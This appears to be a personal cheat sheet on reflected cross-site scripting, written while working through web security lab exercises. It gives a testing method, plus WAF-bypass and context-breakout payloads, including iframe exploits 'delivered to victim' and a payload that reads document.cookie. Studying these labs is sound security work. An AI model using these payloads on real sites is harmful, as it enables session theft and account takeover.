Table of contents
Reflected XSS
What is it?
Reflected XSS may execute javascript because an input is refected on the page.
For example:
https://insecure-website.com/search?term=gift
get reflected as:
<p>You searched for: gift</p>
Then
https://insecure-website.com/search?term=<script>alert('XSS')</script>
will probably be reflected as:
<p>You searched for: <script>alert('XSS')</script></p>
popping a alert with XSS as contents
How to find it?
Use steps to find it (burpsuite scanner should warn.)
- Test every endpoint
- all parameters in URL query string
- all parameters in message body
- URL file path
- HTTP headers
- Submit random alpha values
- Check if the value is reflected
- Determine the reflection context
- Is it in the page?
- Is it in a tag attribute?
- Is it in javascript?
- Is it in CSS?
- Test a candidate payload
- Test alternative payload
- use closing quotes when needed
- Use bypass when needed
- Test the attack in a browser
Attacks on tags
bypass WAF steps
- Copy all tags from the xss cheatsheet
- Burp Intrude them into the reflecting field
- Make note of which passes
- Repeat for all events
- Make note of which passes
- Create an exploit in theexploit server
Example body tag is allowed with the onresize is allowed:
<iframe src="https://your-lab-id.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
Deliver to victim
Custom attributes
<script>
location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>
Deliver to victim
All events and href blocked
https://your-lab-id.web-security-academy.net/?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E
Reflected in SVG
Approach like the WAF bypass, but in svg:
https://your-lab-id.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E
Deliver to victim
Angle bracket <> html encoded:
When this does not work since <> is not allowed:
"><script>alert(document.domain)</script>
try this:
" autofocus onfocus=alert(document.domain) x="
effectively inserting an event on the tag
Setting an access key
Using
https://your-lab-id.web-security-academy.net/?%27accesskey=%27x%27onclick=%27alert(1)
The access key ALT-X is set. Just trigger the victim to use it ;)
Attacks on javascript
We have to take control of the javascript, for example:
<script>
...
var input = 'controllable data here';
...
</script>
We can insert
</script><img src=1 onerror=alert(document.domain)>
Ending the script part and using the img tag error event to trigger XSS.
quote and double quote escaped
use
</script><script>alert(1)</script>
So not using quotes or double quotes
encoded angle brackets <>
use
'-alert(1)-'
to break out or
'-alert(document.domain)-'
';alert(document.domain)//
to break out of string literals
other
If
';alert(document.domain)//
is converted to
\';alert(document.domain)//
use this alternative payload
\';alert(document.domain)//
to get it converted to:
\\';alert(document.domain)//
The way to test:
- Submit random alpha string
- Check response
- Try test’test and observe
- try test\test and observe
- try test”test and observe
With escaped single quote, encoded double quota and angle baackets
\'-alert(1)//
Globally assing error handler and throw error
onerror=alert;throw 1
This causes alert to be called with ‘1’
Deliver using
https://your-lab-id.web-security-academy.net/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27
Javascript template literals
Imagine having
document.getElementById('message').innerText = `Welcome, ${user.displayName}.`;
And a XSS context as
<script>
...
var input = `controllable data here`;
...
</script>
the payload can be:
${alert(document.domain)}
Angular sandbox escaping
References:
Cheatsheets
portswigger XSS cheatsheet owasp xss filter evasion cheatsheet